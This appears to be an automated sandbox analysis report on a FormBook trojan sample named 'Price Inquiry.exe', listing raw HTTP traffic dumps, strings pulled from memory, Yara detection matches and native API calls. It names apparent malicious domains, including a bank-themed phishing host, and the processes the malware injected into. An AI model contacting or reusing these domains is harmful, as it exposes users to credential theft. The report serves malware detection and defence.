Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 15 Oct 2024 14:21:22 GMTServer: ApacheX-Frame-Options: SAMEORIGINContent-Length: 16052X-XSS-Protection: 1; mode=blockConnection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6e 6f 72 6d 61 6c 69 7a 65 2f 35 2e 30 2e 30 2f 6e 6f 72 6d 61 6c 69 7a 65 2e 6d 69 6e 2e 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 34 32 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 6d 61 69 6e 3e 0a 20 3c 73 76 67 0a 20 20 20 20 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 35 34 31 2e 31 37 32 30 36 20 33 32 38 2e 34 35 31 38 34 22 0a 20 20 20 20 20 68 65 69 67 68 74 3d 22 33 32 38 2e 34 35 31 38 34 22 0a 20 20 20 20 20 77 69 64 74 68 3d 22 35 34 31 2e 31 37 32 30 36 22 0a 20 20 20 20 20 69 64 3d 22 73 76 67 32 22 0a 20 20 20 20 20 76 65 72 73 69 6f 6e 3d 22 31 2e 31 22 3e 0a 20 20 20 20 3c 6d 65 74 61 64 61 74 61 0a 20 20 20 20 20 20 20 69 64 3d 22 6d 65 74 61 64 61 74 61 38 22 3e 0a 20 20 20 20 3c 2f 6d 65 74 61 64 61 74 61 3e 0a 20 20 20 20 3c 64 65 66 73 0a 20 20 20 20 20 20 20 69 64 3d 22 64 65 66 73 36 22 3e 0a 20 20 20 20 20 20 3c 70 61 74 74 65 72 6e 0a 20 20 20 20 20 20 20 20 20 70 61 74 74 65 72 6e 55 6e 69 74 73 3d 22 75 73 65 72 53 70 61 63 65 4f 6e 55 73 65 22 0a 20 20 20 20 20 20 20 20 20 77 69 64 74 68 3d 22 31 2e 35 22 0a 20 20 20 20 20 20 20 20 20 68 65 69 67 68 74 3d 22 31 22 0a 20 20 20 20 20 20 20 20 20 70 61 74 74 65 72 6e 54 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 30 2c 30 29 20 73 63 61 6c 65 28 31 30 2c 31 30 29 22 0a 20 20 20 20 20 20 20 20 20 69 64 3d 22 53 74 72 69 70 73 32 5f 31 22 3e 0a 20 20 20 20 20 20 20 20 3c 72 65 63 74 0a 20 20 20 20 20 20 20 20 20 20 20 73 74 79 6c 65 3d 22 66 69 6c 6c 3a 62 6c 61 63 6b 3b 73 74 72 6f 6b 65 3a 6e 6f 6e 65 22 0a 20 20 20 20 20 20 20 20 20 20 20 78 3d 22 30 22 0a 20 20 20 20 20 20 20 20 20 20 20 79 3d 22 2d 30 2e 35 22 0a 20 20 20 20 20 20 20 20 20 20 20 77 69 64 74 68 3d 22 31 22 0a 20 20 20 20 20 20 20 20 20 20 20 68 65 69 67 68 74 3d 22 32 22 0a 20 20 20 20 20 20 20 20 20 20 20 69 64 3d 22 72 65 63 74 35 34 31 39 22 20 2f 3e 0a 20 20 20 20 20 20 3c 2f 70 61 74 74 65 72 6e 3e 0a 20 20 20 20 20 20 3c 6c 69 6e 65 61 72 47 72 61 64 69 65 6e 74 0a 20 20 20 20 20 20 20 20 20 6f 73 62 3a 70 61 69 6e 74 3d 22 73 6f 6c 69 64 22 0a 20 20 20 20 20 20 20 20 20 69 64 3d
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 15 Oct 2024 14:21:25 GMTServer: ApacheX-Frame-Options: SAMEORIGINContent-Length: 16052X-XSS-Protection: 1; mode=blockConnection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6e 6f 72 6d 61 6c 69 7a 65 2f 35 2e 30 2e 30 2f 6e 6f 72 6d 61 6c 69 7a 65 2e 6d 69 6e 2e 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 34 32 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 6d 61 69 6e 3e 0a 20 3c 73 76 67 0a 20 20 20 20 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 35 34 31 2e 31 37 32 30 36 20 33 32 38 2e 34 35 31 38 34 22 0a 20 20 20 20 20 68 65 69 67 68 74 3d 22 33 32 38 2e 34 35 31 38 34 22 0a 20 20 20 20 20 77 69 64 74 68 3d 22 35 34 31 2e 31 37 32 30 36 22 0a 20 20 20 20 20 69 64 3d 22 73 76 67 32 22 0a 20 20 20 20 20 76 65 72 73 69 6f 6e 3d 22 31 2e 31 22 3e 0a 20 20 20 20 3c 6d 65 74 61 64 61 74 61 0a 20 20 20 20 20 20 20 69 64 3d 22 6d 65 74 61 64 61 74 61 38 22 3e 0a 20 20 20 20 3c 2f 6d 65 74 61 64 61 74 61 3e 0a 20 20 20 20 3c 64 65 66 73 0a 20 20 20 20 20 20 20 69 64 3d 22 64 65 66 73 36 22 3e 0a 20 20 20 20 20 20 3c 70 61 74 74 65 72 6e 0a 20 20 20 20 20 20 20 20 20 70 61 74 74 65 72 6e 55 6e 69 74 73 3d 22 75 73 65 72 53 70 61 63 65 4f 6e 55 73 65 22 0a 20 20 20 20 20 20 20 20 20 77 69 64 74 68 3d 22 31 2e 35 22 0a 20 20 20 20 20 20 20 20 20 68 65 69 67 68 74 3d 22 31 22 0a 20 20 20 20 20 20 20 20 20 70 61 74 74 65 72 6e 54 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 30 2c 30 29 20 73 63 61 6c 65 28 31 30 2c 31 30 29 22 0a 20 20 20 20 20 20 20 20 20 69 64 3d 22 53 74 72 69 70 73 32 5f 31 22 3e 0a 20 20 20 20 20 20 20 20 3c 72 65 63 74 0a 20 20 20 20 20 20 20 20 20 20 20 73 74 79 6c 65 3d 22 66 69 6c 6c 3a 62 6c 61 63 6b 3b 73 74 72 6f 6b 65 3a 6e 6f 6e 65 22 0a 20 20 20 20 20 20 20 20 20 20 20 78 3d 22 30 22 0a 20 20 20 20 20 20 20 20 20 20 20 79 3d 22 2d 30 2e 35 22 0a 20 20 20 20 20 20 20 20 20 20 20 77 69 64 74 68 3d 22 31 22 0a 20 20 20 20 20 20 20 20 20 20 20 68 65 69 67 68 74 3d 22 32 22 0a 20 20 20 20 20 20 20 20 20 20 20 69 64 3d 22 72 65 63 74 35 34 31 39 22 20 2f 3e 0a 20 20 20 20 20 20 3c 2f 70 61 74 74 65 72 6e 3e 0a 20 20 20 20 20 20 3c 6c 69 6e 65 61 72 47 72 61 64 69 65 6e 74 0a 20 20 20 20 20 20 20 20 20 6f 73 62 3a 70 61 69 6e 74 3d 22 73 6f 6c 69 64 22 0a 20 20 20 20 20 20 20 20 20 69 64 3d
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 15 Oct 2024 14:21:27 GMTServer: ApacheX-Frame-Options: SAMEORIGINContent-Length: 16052X-XSS-Protection: 1; mode=blockConnection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6e 6f 72 6d 61 6c 69 7a 65 2f 35 2e 30 2e 30 2f 6e 6f 72 6d 61 6c 69 7a 65 2e 6d 69 6e 2e 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 34 32 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 6d 61 69 6e 3e 0a 20 3c 73 76 67 0a 20 20 20 20 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 35 34 31 2e 31 37 32 30 36 20 33 32 38 2e 34 35 31 38 34 22 0a 20 20 20 20 20 68 65 69 67 68 74 3d 22 33 32 38 2e 34 35 31 38 34 22 0a 20 20 20 20 20 77 69 64 74 68 3d 22 35 34 31 2e 31 37 32 30 36 22 0a 20 20 20 20 20 69 64 3d 22 73 76 67 32 22 0a 20 20 20 20 20 76 65 72 73 69 6f 6e 3d 22 31 2e 31 22 3e 0a 20 20 20 20 3c 6d 65 74 61 64 61 74 61 0a 20 20 20 20 20 20 20 69 64 3d 22 6d 65 74 61 64 61 74 61 38 22 3e 0a 20 20 20 20 3c 2f 6d 65 74 61 64 61 74 61 3e 0a 20 20 20 20 3c 64 65 66 73 0a 20 20 20 20 20 20 20 69 64 3d 22 64 65 66 73 36 22 3e 0a 20 20 20 20 20 20 3c 70 61 74 74 65 72 6e 0a 20 20 20 20 20 20 20 20 20 70 61 74 74 65 72 6e 55 6e 69 74 73 3d 22 75 73 65 72 53 70 61 63 65 4f 6e 55 73 65 22 0a 20 20 20 20 20 20 20 20 20 77 69 64 74 68 3d 22 31 2e 35 22 0a 20 20 20 20 20 20 20 20 20 68 65 69 67 68 74 3d 22 31 22 0a 20 20 20 20 20 20 20 20 20 70 61 74 74 65 72 6e 54 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 30 2c 30 29 20 73 63 61 6c 65 28 31 30 2c 31 30 29 22 0a 20 20 20 20 20 20 20 20 20 69 64 3d 22 53 74 72 69 70 73 32 5f 31 22 3e 0a 20 20 20 20 20 20 20 20 3c 72 65 63 74 0a 20 20 20 20 20 20 20 20 20 20 20 73 74 79 6c 65 3d 22 66 69 6c 6c 3a 62 6c 61 63 6b 3b 73 74 72 6f 6b 65 3a 6e 6f 6e 65 22 0a 20 20 20 20 20 20 20 20 20 20 20 78 3d 22 30 22 0a 20 20 20 20 20 20 20 20 20 20 20 79 3d 22 2d 30 2e 35 22 0a 20 20 20 20 20 20 20 20 20 20 20 77 69 64 74 68 3d 22 31 22 0a 20 20 20 20 20 20 20 20 20 20 20 68 65 69 67 68 74 3d 22 32 22 0a 20 20 20 20 20 20 20 20 20 20 20 69 64 3d 22 72 65 63 74 35 34 31 39 22 20 2f 3e 0a 20 20 20 20 20 20 3c 2f 70 61 74 74 65 72 6e 3e 0a 20 20 20 20 20 20 3c 6c 69 6e 65 61 72 47 72 61 64 69 65 6e 74 0a 20 20 20 20 20 20 20 20 20 6f 73 62 3a 70 61 69 6e 74 3d 22 73 6f 6c 69 64 22 0a 20 20 20 20 20 20 20 20 20 69 64 3d
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 15 Oct 2024 14:21:30 GMTServer: ApacheX-Frame-Options: SAMEORIGINContent-Length: 16052X-XSS-Protection: 1; mode=blockConnection: closeContent-Type: text/html; charset=utf-8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6e 6f 72 6d 61 6c 69 7a 65 2f 35 2e 30 2e 30 2f 6e 6f 72 6d 61 6c 69 7a 65 2e 6d 69 6e 2e 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 34 32 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 6d 61 69 6e 3e 0a 20 3c 73 76 67 0a 20 20 20 20 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 35 34 31 2e 31 37 32 30 36 20 33 32 38 2e 34 35 31 38 34 22 0a 20 20 20 20 20 68 65 69 67 68 74 3d 22 33 32 38 2e 34 35 31 38 34 22 0a 20 20 20 20 20 77 69 64 74 68 3d 22 35 34 31 2e 31 37 32 30 36 22 0a 20 20 20 20 20 69 64 3d 22 73 76 67 32 22 0a 20 20 20 20 20 76 65 72 73 69 6f 6e 3d 22 31 2e 31 22 3e 0a 20 20 20 20 3c 6d 65 74 61 64 61 74 61 0a 20 20 20 20 20 20 20 69 64 3d 22 6d 65 74 61 64 61 74 61 38 22 3e 0a 20 20 20 20 3c 2f 6d 65 74 61 64 61 74 61 3e 0a 20 20 20 20 3c 64 65 66 73 0a 20 20 20 20 20 20 20 69 64 3d 22 64 65 66 73 36 22 3e 0a 20 20 20 20 20 20 3c 70 61 74 74 65 72 6e 0a 20 20 20 20 20 20 20 20 20 70 61 74 74 65 72 6e 55 6e 69 74 73 3d 22 75 73 65 72 53 70 61 63 65 4f 6e 55 73 65 22 0a 20 20 20 20 20 20 20 20 20 77 69 64 74 68 3d 22 31 2e 35 22 0a 20 20 20 20 20 20 20 20 20 68 65 69 67 68 74 3d 22 31 22 0a 20 20 20 20 20 20 20 20 20 70 61 74 74 65 72 6e 54 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 30 2c 30 29 20 73 63 61 6c 65 28 31 30 2c 31 30 29 22 0a 20 20 20 20 20 20 20 20 20 69 64 3d 22 53 74 72 69 70 73 32 5f 31 22 3e 0a 20 20 20 20 20 20 20 20 3c 72 65 63 74 0a 20 20 20 20 20 20 20 20 20 20 20 73 74 79 6c 65 3d 22 66 69 6c 6c 3a 62 6c 61 63 6b 3b 73 74 72 6f 6b 65 3a 6e 6f 6e 65 22 0a 20 20 20 20 20 20 20 20 20 20 20 78 3d 22 30 22 0a 20 20 20 20 20 20 20 20 20 20 20 79 3d 22 2d 30 2e 35 22 0a 20 20 20 20 20 20 20 20 20 20 20 77 69 64 74 68 3d 22 31 22 0a 20 20 20 20 20 20 20 20 20 20 20 68 65 69 67 68 74 3d 22 32 22 0a 20 20 20 20 20 20 20 20 20 20 20 69 64 3d 22 72 65 63 74 35 34 31 39 22 20 2f 3e 0a 20 20 20 20 20 20 3c 2f 70 61 74 74 65 72 6e 3e 0a 20 20 20 20 20 20 3c 6c 69 6e 65 61 72 47 72 61 64 69 65 6e 74 0a 20 20 20 20 20 20 20 20 20 6f 73 62 3a 70 61 69 6e 74 3d 22 73 6f 6c 69 64 22 0a 20 20 20 20 20 20 20

Source: Price Inquiry.exe	String found in binary or memory: http://tempuri.org/DataSet1.xsd
Source: tzutil.exe, 00000009.00000002.4629778770.000000000412C000.00000004.10000000.00040000.00000000.sdmp, pfyyryeDyx.exe, 0000000B.00000002.4627580846.0000000003BBC000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: http://www.clientebradesco.online/wouj?gp=1&js=1&uuid=1729002025.0056686924&other_args=eyJ1cmkiOiAiL
Source: pfyyryeDyx.exe, 0000000B.00000002.4629908640.0000000005671000.00000040.80000000.00040000.00000000.sdmp	String found in binary or memory: http://www.farukugurluakdogan.xyz
Source: pfyyryeDyx.exe, 0000000B.00000002.4629908640.0000000005671000.00000040.80000000.00040000.00000000.sdmp	String found in binary or memory: http://www.farukugurluakdogan.xyz/mx00/
Source: pfyyryeDyx.exe, 0000000B.00000002.4627580846.0000000003BBC000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: http://www70.clientebradesco.online/
Source: tzutil.exe, 00000009.00000002.4631952987.00000000079F8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: tzutil.exe, 00000009.00000002.4631952987.00000000079F8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: tzutil.exe, 00000009.00000002.4629778770.0000000004906000.00000004.10000000.00040000.00000000.sdmp, pfyyryeDyx.exe, 0000000B.00000002.4627580846.0000000004396000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://cdnjs.cloudflare.com/ajax/libs/normalize/5.0.0/normalize.min.css
Source: tzutil.exe, 00000009.00000002.4631952987.00000000079F8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: tzutil.exe, 00000009.00000002.4631952987.00000000079F8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: tzutil.exe, 00000009.00000002.4631952987.00000000079F8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: tzutil.exe, 00000009.00000002.4631952987.00000000079F8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: tzutil.exe, 00000009.00000002.4631952987.00000000079F8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: tzutil.exe, 00000009.00000002.4629778770.0000000003AE4000.00000004.10000000.00040000.00000000.sdmp, pfyyryeDyx.exe, 0000000B.00000002.4627580846.0000000003574000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000C.00000002.2733010961.0000000011234000.00000004.80000000.00040000.00000000.sdmp	String found in binary or memory: https://help.reg.ru/support/ssl-sertifikaty/1-etap-zakaz-ssl-sertifikata/kak-zakazat-besplatnyy-ssl-
Source: tzutil.exe, 00000009.00000002.4625966716.0000000002B3E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
Source: tzutil.exe, 00000009.00000002.4625966716.0000000002B3E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
Source: tzutil.exe, 00000009.00000003.2620365028.00000000079DE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_authorize.srfhttps://login.live.com/oauth20_desktop.srfhttps://login.
Source: tzutil.exe, 00000009.00000002.4625966716.0000000002B3E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
Source: tzutil.exe, 00000009.00000002.4625966716.0000000002B3E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033
Source: tzutil.exe, 00000009.00000002.4625966716.0000000002B3E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
Source: tzutil.exe, 00000009.00000002.4625966716.0000000002B3E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
Source: tzutil.exe, 00000009.00000002.4629778770.0000000003AE4000.00000004.10000000.00040000.00000000.sdmp, pfyyryeDyx.exe, 0000000B.00000002.4627580846.0000000003574000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000C.00000002.2733010961.0000000011234000.00000004.80000000.00040000.00000000.sdmp	String found in binary or memory: https://parking.reg.ru/script/get_domain_data?domain_name=www.redimpact.online&rand=
Source: tzutil.exe, 00000009.00000002.4629778770.0000000003AE4000.00000004.10000000.00040000.00000000.sdmp, pfyyryeDyx.exe, 0000000B.00000002.4627580846.0000000003574000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000C.00000002.2733010961.0000000011234000.00000004.80000000.00040000.00000000.sdmp	String found in binary or memory: https://reg.ru
Source: tzutil.exe, 00000009.00000002.4631952987.00000000079F8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.ecosia.org/newtab/
Source: tzutil.exe, 00000009.00000002.4629778770.0000000003C76000.00000004.10000000.00040000.00000000.sdmp, pfyyryeDyx.exe, 0000000B.00000002.4627580846.0000000003706000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://www.google.com
Source: tzutil.exe, 00000009.00000002.4629778770.0000000003AE4000.00000004.10000000.00040000.00000000.sdmp, pfyyryeDyx.exe, 0000000B.00000002.4627580846.0000000003574000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000C.00000002.2733010961.0000000011234000.00000004.80000000.00040000.00000000.sdmp	String found in binary or memory: https://www.reg.ru/dedicated/?utm_source=www.redimpact.online&utm_medium=parking&utm_campaign=s_land
Source: tzutil.exe, 00000009.00000002.4629778770.0000000003AE4000.00000004.10000000.00040000.00000000.sdmp, pfyyryeDyx.exe, 0000000B.00000002.4627580846.0000000003574000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000C.00000002.2733010961.0000000011234000.00000004.80000000.00040000.00000000.sdmp	String found in binary or memory: https://www.reg.ru/domain/new/?utm_source=www.redimpact.online&utm_medium=parking&utm_campaign=s_lan
Source: tzutil.exe, 00000009.00000002.4629778770.0000000003AE4000.00000004.10000000.00040000.00000000.sdmp, pfyyryeDyx.exe, 0000000B.00000002.4627580846.0000000003574000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000C.00000002.2733010961.0000000011234000.00000004.80000000.00040000.00000000.sdmp	String found in binary or memory: https://www.reg.ru/hosting/?utm_source=www.redimpact.online&utm_medium=parking&utm_campaign=s_land_h
Source: tzutil.exe, 00000009.00000002.4629778770.0000000003AE4000.00000004.10000000.00040000.00000000.sdmp, pfyyryeDyx.exe, 0000000B.00000002.4627580846.0000000003574000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000C.00000002.2733010961.0000000011234000.00000004.80000000.00040000.00000000.sdmp	String found in binary or memory: https://www.reg.ru/sozdanie-saita/
Source: tzutil.exe, 00000009.00000002.4629778770.0000000003AE4000.00000004.10000000.00040000.00000000.sdmp, pfyyryeDyx.exe, 0000000B.00000002.4627580846.0000000003574000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000C.00000002.2733010961.0000000011234000.00000004.80000000.00040000.00000000.sdmp	String found in binary or memory: https://www.reg.ru/whois/?check=&dname=www.redimpact.online&reg_source=parking_auto

E-Banking Fraud

Yara detected FormBook

Source: Yara match	File source: 4.2.Price Inquiry.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.Price Inquiry.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000009.00000002.4627716653.0000000002DC0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.2435065362.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.2460854368.00000000047D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.4627610599.0000000002D70000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.4620677236.0000000000590000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.2438337305.0000000002430000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.4627308589.0000000003750000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY

System Summary

Malicious sample detected (through community Yara rule)

Source: 4.2.Price Inquiry.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 4.2.Price Inquiry.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000009.00000002.4627716653.0000000002DC0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000004.00000002.2435065362.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000004.00000002.2460854368.00000000047D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000009.00000002.4627610599.0000000002D70000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000009.00000002.4620677236.0000000000590000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000004.00000002.2438337305.0000000002430000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000008.00000002.4627308589.0000000003750000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown

Source: C:\Users\user\Desktop\Price Inquiry.exe	Code function: 4_2_0042C4C3 NtClose,	4_2_0042C4C3
Source: C:\Users\user\Desktop\Price Inquiry.exe	Code function: 4_2_01712B60 NtClose,LdrInitializeThunk,	4_2_01712B60
Source: C:\Users\user\Desktop\Price Inquiry.exe	Code function: 4_2_01712DF0 NtQuerySystemInformation,LdrInitializeThunk,	4_2_01712DF0
Source: C:\Users\user\Desktop\Price Inquiry.exe	Code function: 4_2_01712C70 NtFreeVirtualMemory,LdrInitializeThunk,	4_2_01712C70
Source: C:\Users\user\Desktop\Price Inquiry.exe	Code function: 4_2_017135C0 NtCreateMutant,LdrInitializeThunk,	4_2_017135C0
Source: C:\Users\user\Desktop\Price Inquiry.exe	Code function: 4_2_01714340 NtSetContextThread,	4_2_01714340
Source: C:\Users\user\Desktop\Price Inquiry.exe	Code function: 4_2_01714650 NtSuspendThread,	4_2_01714650
Source: C:\Users\user\Desktop\Price Inquiry.exe	Code function: 4_2_01712BF0 NtAllocateVirtualMemory,	4_2_01712BF0
Source: C:\Users\user\Desktop\Price Inquiry.exe	Code function: 4_2_01712BE0 NtQueryValueKey,	4_2_01712BE0
Source: C:\Users\user\Desktop\Price Inquiry.exe	Code function: 4_2_01712BA0 NtEnumerateValueKey,	4_2_01712BA0
Source: C:\Users\user\Desktop\Price Inquiry.exe	Code function: 4_2_01712B80 NtQueryInformationFile,	4_2_01712B80
Source: C:\Users\user\Desktop\Price Inquiry.exe	Code function: 4_2_01712AF0 NtWriteFile,	4_2_01712AF0
Source: C:\Users\user\Desktop\Price Inquiry.exe	Code function: 4_2_01712AD0 NtReadFile,	4_2_01712AD0
